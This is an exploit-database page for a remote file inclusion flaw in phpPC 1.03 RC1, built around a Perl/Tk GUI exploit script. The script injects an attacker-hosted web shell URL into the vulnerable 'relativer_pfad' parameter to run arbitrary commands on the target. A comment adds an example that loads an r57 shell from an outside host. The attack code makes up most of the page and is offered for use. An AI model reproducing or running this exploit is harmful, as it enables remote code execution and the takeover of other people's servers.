Lucene search
K

phpPC <= 1.03 RC1 (/lib/functions.inc.php) Remote File Include Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

phpPC 1.03 RC1 Remote File Include Exploit by the-wolf-ks

Code

                                                #!/usr/bin/perl

#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [xp10 TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- phpPC &#60;= 1.03 RC1 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: phppc
#- [Script site: http://www.phppc.de/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: The-wolf-ksa (wolf)
#+
#-    wolf TEAM
#+
#-          Contact: [email protected]
#-                        or
#-           http://www.xp10.com.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz:  ;-)
#- Ema:
#-                 my friends
#-
#- Greetz for all users wolf TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (wolf)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Example: http://[site]/phppc/lib/functions.inc.php?relativer_pfad=http://members.lycos.co.uk/visualmx/r57n.txt?
use Tk;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title =&#62; &#34;wolf TEAM :: phpPC 1.03  Remote File Include Exploit :: by the-wolf-ksa ;-)  &#34; );
$mw-&#62;geometry ( &#39;500x300&#39; ) ;
$mw-&#62;resizable(0,0);

$mw-&#62;Label(-text =&#62; &#39;phpPC 1.03 RC1 Remote File Include Exploit by the-wolf-ksa&#39;, -font =&#62; &#39;{Verdana} 7 bold&#39;,-foreground=&#62;&#39;blue&#39;)-&#62;pack();
$mw-&#62;Label(-text =&#62; &#39;&#39;)-&#62;pack();

$fleft=$mw-&#62;Frame()-&#62;pack ( -side =&#62; &#39;left&#39;, -anchor =&#62; &#39;ne&#39;) ;
$fright=$mw-&#62;Frame()-&#62;pack ( -side =&#62; &#39;left&#39;, -anchor =&#62; &#39;nw&#39;) ;

$url = &#39;http://www.site.com/[path]/lib/functions.inc.php?relativer_pfad=&#39;;
$shell_path = &#39;http://shell.txt?&#39;;
$cmd = &#39;ls -la&#39;;


$fleft-&#62;Label ( -text =&#62; &#39;Script Path: &#39;, -font =&#62; &#39;{Verdana} 8 bold&#39;) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;e&#39; ) ;
$fright-&#62;Entry ( -relief =&#62; &#34;groove&#34;, -width =&#62; 35, -font =&#62; &#39;{Verdana} 8&#39;, -textvariable =&#62; \$url) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;w&#39; ) ;

$fleft-&#62;Label ( -text =&#62; &#39;Shell Path: &#39;, -font =&#62; &#39;{Verdana} 8 bold&#39; ) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;e&#39; ) ;
$fright-&#62;Entry ( -relief =&#62; &#34;groove&#34;, -width =&#62; 35, -font =&#62; &#39;{Verdana} 8&#39;, -textvariable =&#62; \$shell_path) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;w&#39; ) ;

$fleft-&#62;Label ( -text =&#62; &#39;CMD: &#39;, -font =&#62; &#39;{Verdana} 8 bold&#39;) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;e&#39; ) ;
$fright-&#62;Entry ( -relief =&#62; &#34;groove&#34;, -width =&#62; 35, -font =&#62; &#39;{Verdana} 8&#39;, -textvariable =&#62; \$cmd) -&#62;pack ( -side =&#62; &#34;top&#34; , -anchor =&#62; &#39;w&#39; ) ;

$fright-&#62;Label( -text =&#62; &#39; &#39;)-&#62;pack();
$fleft-&#62;Label( -text =&#62; &#39; &#39;)-&#62;pack();



$fright-&#62;Button(-text    =&#62; &#39;Exploit Include Vulnerability&#39;,
               -relief =&#62; &#34;groove&#34;,
               -width =&#62; &#39;30&#39;,
               -font =&#62; &#39;{Verdana} 8 bold&#39;,
               -activeforeground =&#62; &#39;red&#39;,
               -command =&#62; \&akcja
              )-&#62;pack();


$fright-&#62;Label( -text =&#62; &#39; &#39;)-&#62;pack();
$fright-&#62;Label( -text =&#62; &#39;Exploit coded by the-wolf-ksa&#39;, -font =&#62; &#39;{Verdana} 7&#39;)-&#62;pack();
$fright-&#62;Label( -text =&#62; &#39;wolf TEAM :: The Best Polish Team&#39;, -font =&#62; &#39;{Verdana} 7&#39;)-&#62;pack();
$fright-&#62;Label( -text =&#62; &#39;[email protected]/&#39;, -font =&#62; &#39;{Verdana} 7&#39;)-&#62;pack();

MainLoop();

sub akcja()
{
$InfoWindow=$mw-&#62;DialogBox(-title   =&#62; &#39;wolf TEAM :: Exploit by the-wolf-ksa ;-) &#39;, -buttons =&#62; [&#34;OK&#34;]);
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39; for help [email protected] #wolfteam&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;wolf TEAM SITE: http://www.xp10.com.pl/&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;Greetz For my friends ;-)&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;
$InfoWindow-&#62;add(&#39;Label&#39;, -text =&#62; &#39;&#39;, -font =&#62; &#39;{Verdana} 8&#39;)-&#62;pack;

system(&#34;start $url$shell_path$cmd&#34;);
$InfoWindow-&#62;Show();
}
# xp10.com ]

# milw0rm.com [2006-10-08]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
10